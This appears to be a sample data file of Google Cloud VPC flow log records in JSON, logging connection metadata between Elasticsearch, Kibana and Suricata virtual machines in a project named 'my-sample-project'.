+{"insertId":"y4wffpfk2ero3","jsonPayload":{"bytes_sent":"208416","connection":{"dest_ip":"67.43.156.13","dest_port":33590,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"249","reporter":"SRC","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroh","jsonPayload":{"bytes_sent":"90977","connection":{"dest_ip":"192.168.2.177","dest_port":60108,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"357","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erom","jsonPayload":{"bytes_sent":"187301","connection":{"dest_ip":"67.43.156.13","dest_port":33536,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"242","reporter":"SRC","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2ero9","jsonPayload":{"bytes_sent":"139106","connection":{"dest_ip":"10.87.40.76","dest_port":33560,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erog","jsonPayload":{"bytes_sent":"1733360","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60108},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:54.108975753Z","packets_sent":"708","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.762958327Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2ero7","jsonPayload":{"bytes_sent":"149157","connection":{"dest_ip":"67.43.156.13","dest_port":33874,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"74","reporter":"SRC","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroe","jsonPayload":{"bytes_sent":"11108","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"95","reporter":"DEST","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroa","jsonPayload":{"bytes_sent":"67337","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33590},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565116665Z","packets_sent":"351","reporter":"DEST","rtt_msec":"109","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147151100Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroi","jsonPayload":{"bytes_sent":"136375","connection":{"dest_ip":"10.87.40.76","dest_port":33538,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2ero8","jsonPayload":{"bytes_sent":"181424","connection":{"dest_ip":"67.43.156.13","dest_port":33690,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.393929808Z","packets_sent":"241","reporter":"SRC","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erol","jsonPayload":{"bytes_sent":"9303","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933099658Z","packets_sent":"94","reporter":"DEST","rtt_msec":"142","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.513551480Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2ero4","jsonPayload":{"bytes_sent":"142871","connection":{"dest_ip":"67.43.156.13","dest_port":33572,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821149051Z","packets_sent":"77","reporter":"SRC","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eror","jsonPayload":{"bytes_sent":"158811","connection":{"dest_ip":"67.43.156.13","dest_port":33968,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965119632Z","packets_sent":"69","reporter":"SRC","rtt_msec":"201","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480430427Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erob","jsonPayload":{"bytes_sent":"13455","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33880},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821047175Z","packets_sent":"81","reporter":"DEST","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erox","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":57300,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroc","jsonPayload":{"bytes_sent":"71014","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65315},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"728","reporter":"DEST","rtt_msec":"210","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erok","jsonPayload":{"bytes_sent":"60749","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eros","jsonPayload":{"bytes_sent":"160451","connection":{"dest_ip":"67.43.156.13","dest_port":33880,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821138391Z","packets_sent":"66","reporter":"SRC","rtt_msec":"252","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470071135Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erod","jsonPayload":{"bytes_sent":"169173","connection":{"dest_ip":"10.87.40.76","dest_port":33574,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"64","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2ero6","jsonPayload":{"bytes_sent":"118762","connection":{"dest_ip":"67.43.156.13","dest_port":65315,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220720811Z","packets_sent":"615","reporter":"SRC","rtt_msec":"210","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.844068405Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eron","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33576},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"96","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroy","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":57300},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:48:22.156322353Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:48:22.044604322Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erof","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":54662,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erov","jsonPayload":{"bytes_sent":"11674","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"335","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470754779Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erop","jsonPayload":{"bytes_sent":"62831","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"346","reporter":"DEST","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2erou","jsonPayload":{"bytes_sent":"15169","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33574},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"93","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466811088Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} +{"insertId":"y4wffpfk2eroj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":54662},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 